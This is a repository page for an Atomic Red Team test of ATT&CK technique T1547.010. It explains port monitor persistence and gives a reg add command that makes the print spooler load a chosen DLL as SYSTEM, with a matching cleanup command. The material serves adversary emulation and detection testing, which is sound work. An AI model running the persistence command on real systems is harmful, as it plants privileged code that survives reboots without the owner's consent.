security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c7310aa4276f8d1ac64bd3f23eefbfdd6e2e42ff
atomic-red-team/atomics/T1547.010/T1547.010.md
T
Atomic Red Team doc generator 9f6a1eab36 Generated docs from job=generate-docs branch=master [ci skip]
2026-02-18 16:55:45 +00:00

45 lines
2.1 KiB
Markdown
Raw Blame History

# T1547.010 - Boot or Logon Autostart Execution: Port Monitors
## Description from ATT&CK
> Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the <code>AddMonitor</code> API call to set a DLL to be loaded at startup.(Citation: AddMonitor) This DLL can be located in <code>C:\Windows\System32</code> and will be loaded and run by the print spooler service, `spoolsv.exe`, under SYSTEM level permissions on boot.(Citation: Bloxham)
>
> Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to the `Driver` value of an existing or new arbitrarily named subkey of <code>HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors</code>. The Registry key contains entries for the following:
>
> * Local Port
> * Standard TCP/IP Port
> * USB Monitor
> * WSD Port
[Source](https://attack.mitre.org/techniques/T1547/010)
## Atomic Tests
- [Atomic Test #1: Add Port Monitor persistence in Registry](#atomic-test-1-add-port-monitor-persistence-in-registry)
### Atomic Test #1: Add Port Monitor persistence in Registry
Add key-value pair to a Windows Port Monitor registry. On the subsequent reboot DLL will be execute under spoolsv with NT AUTHORITY/SYSTEM privilege.
**Supported Platforms:** Windows
**auto_generated_guid:** `d34ef297-f178-4462-871e-9ce618d44e50`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| monitor_dll | Addition to port monitor registry key. Normally refers to a DLL name in C:&#92;Windows&#92;System32 but an arbitrary DLL can be specified with the absolute path. | path | $PathToAtomicsFolder&#92;T1547.010&#92;bin&#92;PortMonitor.dll|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "hklm\system\currentcontrolset\control\print\monitors\AtomicRedTeam" /v "Driver" /d "#{monitor_dll}" /t REG_SZ /f
```
#### Cleanup Commands
```cmd
reg delete "hklm\system\currentcontrolset\control\print\monitors\AtomicRedTeam" /f >nul 2>&1
```
Reference in New Issue View Git Blame Copy Permalink